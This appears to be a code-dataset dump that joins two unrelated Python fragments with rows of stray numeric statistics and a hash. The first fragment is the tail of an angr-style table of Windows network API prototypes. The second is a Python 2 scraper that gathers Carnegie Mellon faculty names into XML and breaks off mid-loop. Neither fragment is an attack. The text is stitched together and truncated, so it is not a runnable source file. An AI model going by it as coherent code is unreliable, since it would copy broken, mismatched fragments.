'WNetUseConnectionA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="NET_USE_CONNECT_FLAGS"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "lpPassword", "lpUserId", "dwFlags", "lpAccessName", "lpBufferSize", "lpResult"]),
#
'WNetUseConnectionW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="NET_USE_CONNECT_FLAGS"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "lpPassword", "lpUserId", "dwFlags", "lpAccessName", "lpBufferSize", "lpResult"]),
#
'WNetUseConnection4A': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "pAuthBuffer", "cbAuthBuffer", "dwFlags", "lpUseOptions", "cbUseOptions", "lpAccessName", "lpBufferSize", "lpResult"]),
#
'WNetUseConnection4W': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "pAuthBuffer", "cbAuthBuffer", "dwFlags", "lpUseOptions", "cbUseOptions", "lpAccessName", "lpBufferSize", "lpResult"]),
#
'WNetConnectionDialog': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwnd", "dwType"]),
#
'WNetDisconnectDialog': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwnd", "dwType"]),
#
'WNetConnectionDialog1A': SimTypeFunction([SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "hwndOwner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "lpConnRes": SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), "dwFlags": SimTypeInt(signed=False, label="CONNECTDLGSTRUCT_FLAGS"), "dwDevNum": SimTypeInt(signed=False, label="UInt32")}, name="CONNECTDLGSTRUCTA", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpConnDlgStruct"]),
#
'WNetConnectionDialog1W': SimTypeFunction([SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "hwndOwner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "lpConnRes": SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), "dwFlags": SimTypeInt(signed=False, label="CONNECTDLGSTRUCT_FLAGS"), "dwDevNum": SimTypeInt(signed=False, label="UInt32")}, name="CONNECTDLGSTRUCTW", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpConnDlgStruct"]),
#
'WNetDisconnectDialog1A': SimTypeFunction([SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "hwndOwner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "dwFlags": SimTypeInt(signed=False, label="DISCDLGSTRUCT_FLAGS")}, name="DISCDLGSTRUCTA", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpConnDlgStruct"]),
#
'WNetDisconnectDialog1W': SimTypeFunction([SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "hwndOwner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "dwFlags": SimTypeInt(signed=False, label="DISCDLGSTRUCT_FLAGS")}, name="DISCDLGSTRUCTW", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpConnDlgStruct"]),
#
'WNetOpenEnumA': SimTypeFunction([SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), SimTypeInt(signed=False, label="WNET_OPEN_ENUM_USAGE"), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwScope", "dwType", "dwUsage", "lpNetResource", "lphEnum"]),
#
'WNetOpenEnumW': SimTypeFunction([SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), SimTypeInt(signed=False, label="WNET_OPEN_ENUM_USAGE"), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwScope", "dwType", "dwUsage", "lpNetResource", "lphEnum"]),
#
'WNetEnumResourceA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum", "lpcCount", "lpBuffer", "lpBufferSize"]),
#
'WNetEnumResourceW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum", "lpcCount", "lpBuffer", "lpBufferSize"]),
#
'WNetCloseEnum': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum"]),
#
'WNetGetResourceParentA': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpBuffer", "lpcbBuffer"]),
#
'WNetGetResourceParentW': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpBuffer", "lpcbBuffer"]),
#
'WNetGetResourceInformationA': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpBuffer", "lpcbBuffer", "lplpSystem"]),
#
'WNetGetResourceInformationW': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpBuffer", "lpcbBuffer", "lplpSystem"]),
#
'WNetGetUniversalNameA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UNC_INFO_LEVEL"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpLocalPath", "dwInfoLevel", "lpBuffer", "lpBufferSize"]),
#
'WNetGetUniversalNameW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UNC_INFO_LEVEL"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpLocalPath", "dwInfoLevel", "lpBuffer", "lpBufferSize"]),
#
'WNetGetUserA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "lpUserName", "lpnLength"]),
#
'WNetGetUserW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "lpUserName", "lpnLength"]),
#
'WNetGetProviderNameA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwNetType", "lpProviderName", "lpBufferSize"]),
#
'WNetGetProviderNameW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwNetType", "lpProviderName", "lpBufferSize"]),
#
'WNetGetNetworkInformationA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "dwProviderVersion": SimTypeInt(signed=False, label="UInt32"), "dwStatus": SimTypeBottom(label="WIN32_ERROR"), "dwCharacteristics": SimTypeInt(signed=False, label="NETINFOSTRUCT_CHARACTERISTICS"), "dwHandle": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "wNetType": SimTypeShort(signed=False, label="UInt16"), "dwPrinters": SimTypeInt(signed=False, label="UInt32"), "dwDrives": SimTypeInt(signed=False, label="UInt32")}, name="NETINFOSTRUCT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpProvider", "lpNetInfoStruct"]),
#
'WNetGetNetworkInformationW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "dwProviderVersion": SimTypeInt(signed=False, label="UInt32"), "dwStatus": SimTypeBottom(label="WIN32_ERROR"), "dwCharacteristics": SimTypeInt(signed=False, label="NETINFOSTRUCT_CHARACTERISTICS"), "dwHandle": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "wNetType": SimTypeShort(signed=False, label="UInt16"), "dwPrinters": SimTypeInt(signed=False, label="UInt32"), "dwDrives": SimTypeInt(signed=False, label="UInt32")}, name="NETINFOSTRUCT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpProvider", "lpNetInfoStruct"]),
#
'WNetGetLastErrorA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpError", "lpErrorBuf", "nErrorBufSize", "lpNameBuf", "nNameBufSize"]),
#
'WNetGetLastErrorW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpError", "lpErrorBuf", "nErrorBufSize", "lpNameBuf", "nNameBufSize"]),
#
'MultinetGetConnectionPerformanceA': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "dwSpeed": SimTypeInt(signed=False, label="UInt32"), "dwDelay": SimTypeInt(signed=False, label="UInt32"), "dwOptDataSize": SimTypeInt(signed=False, label="UInt32")}, name="NETCONNECTINFOSTRUCT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpNetConnectInfoStruct"]),
#
'MultinetGetConnectionPerformanceW': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "dwSpeed": SimTypeInt(signed=False, label="UInt32"), "dwDelay": SimTypeInt(signed=False, label="UInt32"), "dwOptDataSize": SimTypeInt(signed=False, label="UInt32")}, name="NETCONNECTINFOSTRUCT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpNetConnectInfoStruct"]),
#
'WNetSetLastErrorA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeBottom(label="Void"), arg_names=["err", "lpError", "lpProviders"]),
#
'WNetSetLastErrorW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeBottom(label="Void"), arg_names=["err", "lpError", "lpProviders"]),
}
lib.set_prototypes(prototypes)
| 281.793103
| 1,365
| 0.743882
| 3,396
| 32,688
| 7.108952
| 0.058304
| 0.16171
| 0.147792
| 0.238008
| 0.937868
| 0.937868
| 0.937536
| 0.937536
| 0.933477
| 0.929418
| 0
| 0.019557
| 0.072412
| 32,688
| 115
| 1,366
| 284.243478
| 0.776656
| 0.000857
| 0
| 0
| 0
| 0
| 0.244503
| 0.019039
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.131148
| 0.081967
| 0
| 0.081967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
71650ce7588f84ec9a9c7a6103df071e7316ce7d
| 7,998
|
py
|
Python
|
xiaoqiqi/CMU/scrap_research.py
|
doge-search/webdoge
|
443e758b5c1f962d5c2fe792cdbed01e1208b1cb
|
[
"Unlicense"
] | null | null | null |
xiaoqiqi/CMU/scrap_research.py
|
doge-search/webdoge
|
443e758b5c1f962d5c2fe792cdbed01e1208b1cb
|
[
"Unlicense"
] | null | null | null |
xiaoqiqi/CMU/scrap_research.py
|
doge-search/webdoge
|
443e758b5c1f962d5c2fe792cdbed01e1208b1cb
|
[
"Unlicense"
] | null | null | null |
#coding=utf-8
#!~/python2.7.10/bin/python
import urllib
import urllib2
import re
import os
import sys
from bs4 import BeautifulSoup
import xml.dom.minidom as minidom
import time
import socket
reload(sys)
sys.setdefaultencoding('utf-8')
fout_xml = file('CMU_research.xml', 'w')
doc = minidom.Document()
institution = doc.createElement("institution")
doc.appendChild(institution)
def after(text):
i=0
while text[i] == ' ' or text[i] == '\t' or text[i] == '\n':
i+=1
j=-1
while text[j] == ' ' or text[j] == '\t' or text[j] == '\n':
j-=1
return text[i:j+1]
if __name__ == '__main__':
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Computational Biology Department"))
research.appendChild(groupname)
for i in range(0,1):
url = ' https://www.cs.cmu.edu/directory/cbd?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Computer Science Department"))
research.appendChild(groupname)
for i in range(0,3):
url = ' https://www.cs.cmu.edu/directory/csd?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Human-Computer Interaction Institute"))
research.appendChild(groupname)
for i in range(0,2):
url = 'https://www.cs.cmu.edu/directory/hcii?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Institute for Software Research"))
research.appendChild(groupname)
for i in range(0,2):
url = 'https://www.cs.cmu.edu/directory/isr?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Language Technologies Institute"))
research.appendChild(groupname)
for i in range(0,2):
url = 'https://www.cs.cmu.edu/directory/lti?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
